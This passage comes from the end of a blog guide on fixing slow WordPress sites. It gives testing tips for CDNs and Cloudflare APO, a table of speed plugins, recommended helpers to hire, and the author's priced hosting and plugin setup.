  • Dr. Flare – Chrome Extension to view tons of Cloudflare stats like your cache hit ratio, uncached requests, non-Cloudflare requests, how much % was reduced by Polish/Minify.
  • CDN rewrites – are your files actually being served from your CDN? Check your CDN Analytics, Dr. Flare, or view your source code to make sure files are being served from the CDN when using a CDN URL, like this: cdn.mywebsite.com/wp-content/uploads/logo.png. If you’re using BunnyCDN, you may be able to serve more files from BunnyCDN by adding your CDN URL to your cache plugin on top of using BunnyCDN’s plugin. It worked for me.
  • APO – verify Cloudflare’s APO is working by testing your website in uptrends.com then making sure headers exactly match with what Cloudflare shows in the documentation.
Confirm APO is working by checking headers
  • Asynchronous CSS – if you’re using this, cache plugins should also have documentation.
  • External cron jobs – check the logs in your hosting account to make sure these are firing.
  • Waterfall charts – after each optimization, you should ideally check its impact using a Waterfall chart (better than running another PageSpeed Insights test and testing scores).
  • Clear cache – you may need to clear cache or regenerate critical CSS to see your changes.

25. Speed Plugins

Here’s the full list.

Obviously you don’t need all these especially if you’re using a cache/optimization plugin that already does some of these, Cloudflare image optimizations, or you can code things manually.

Plugin | Category | Price
FlyingPress | Cache | Paid
LiteSpeed Cache | Cache | Free
Perfmatters | Multiple Categories | Paid
Cloudflare | CDN | Paid
Super Page Cache for Cloudflare | CDN | Free
WP-Optimize | Database | Free
FlyingProxy | CDN | Paid
Flying Pages | Resource Hints | Free
Flying Scripts | Delay JavaScript | Free
Flying Analytics | Analytics | Free
Optimole | Image | Freemium
ShortPixel | Image | Freemium
ShortPixel Adaptive Images | Image | Freemium
WP YouTube Lyte | Video | Free
OMGF | Font | Free
WP Foft Loader | Font | Freemium
Pre* Party Resource Hints | Resource Hints | Free
BunnyCDN | CDN | Paid
WP Crontrol | Cron Job | Free
Unbloater | Bloat Removal | Free
Debloat | Bloat Removal | Free
Disable WooCommerce Bloat | Bloat Removal | Free
Heartbeat Control | Bloat Removal | Free
Disable XML-RPC | Bloat Removal | Free
Widget Disable | Bloat Removal | Free
Limit Login Attempts | Security | Free
WPS Hide Login | Security | Free
Redis Object Cache | Cache | Free
Blackhole For Bad Bots | Block Bots | Free
Simple Local Avatars | Comments | Free
Preload Featured Images | LCP | Free
Query Monitor | Diagnostic | Free
WP Server Health Stats | Diagnostic | Free
WP Hosting Benchmark | Diagnostic | Free
WP Hosting Performance Check | Diagnostic | Free

26. Get Help

Still need help? I’m not for hire, but here’s what I got:

DIY

  • Search the WP Speed Matters Facebook Group.
  • Plugins like Perfmatters have great documentation.
  • Gijo Varghese and WP Johnny also put out quality articles.
  • My other articles (if you liked this one, I have plenty more).

Hire Help

  • BDKamol – Pronaya mainly works with Gutenberg, WooCommerce, and Genesis. He's been helping me for over 10 years, ever since I launched my first website and had no visitors. He points me in the right direction and was a key part in launching my new blog, helping me with things like custom coding, CSS styling, theme/plugin recommendations, etc. Pronaya lives in Bangladesh and his communication (and my trust in him) are 100%.
  • WP Johnny – he's a busy guy but you can try hiring him and his team. I was lucky enough to have him help me remove my page builder (which I regret using in the first place and should have known better). While the work is great, it can take a while to get things done.
  • WP Fix It – hired them once to improve issues related to core web vitals. While I was very happy with the work, they closed my tickets without notice saying the project was done, even when I told them I would pay more since truly fixing the issues required more work.

27. My Setup

This will cost about $500/year.

It assumes you already have a lightweight theme (e.g., GeneratePress/Kadence) and pay yearly for Rocket.net since you get 2 months free. It also assumes you're using Rocket.net's lower $25/mo plan (I pay $50/mo for the Business plan). For my site, this is the best setup I've found.

My blog costs around $800/year which is a lot cheaper than I was paying (mainly because hosting gets expensive as you scale). Scaling on Rocket.net is reasonable since monthly visits and RAM are both 10x Kinsta's, and there are no PHP worker limits since only about 10% of traffic hits the origin (due to Ben Gabler's Cloudflare Enterprise setup – I suggest reaching out to him with questions).

LiteSpeed is also solid and can be cheaper since LiteSpeed Cache is free and email hosting is often included. Check out NameHero, ChemiCloud, and Scala (they seem to have good specs and TrustPilot reviews). RunCloud, GridPane, and JohnnyVPS are probably best for larger sites.

Cloudways is who I was using. I still think they’re better than most hosts but it gets expensive with all the add-ons, they use Apache servers, and Cloudflare Enterprise + Breeze need work.

Service | Price | Notes
Rocket.net | $25/mo | Read my full review; OMM1 = $1 first month; 1 year = 2 months free
Cloudflare Enterprise | Free on Rocket.net | No configuration; full page caching; I trust their config
GeneratePress | $249 (one-time) | Less CSS/JS; uses Gutenberg; I use the "Search" theme
GenerateBlocks | $39/yr | More block templates
FlyingPress | $3.5/mo (renewal price) | Gijo's plugin; great for CWV and for real users; configure the settings
Google Workspace | $6/mo | Most cloud hosts don't support email hosting
Perfmatters | $24.95/yr | Asset unloading; bloat removal; optimizations not found in WP Rocket or SG Optimizer; configure the settings
Total Yearly Price | $477.95/yr | Plus one-time cost of GeneratePress

Of course I use other tools/plugins, but that’s my foundation.

I hope you learned something new! Drop me a comment with any questions/suggestions.

Cheers,
Tom

Source :
https://onlinemediamasters.com/slow-wordpress-site/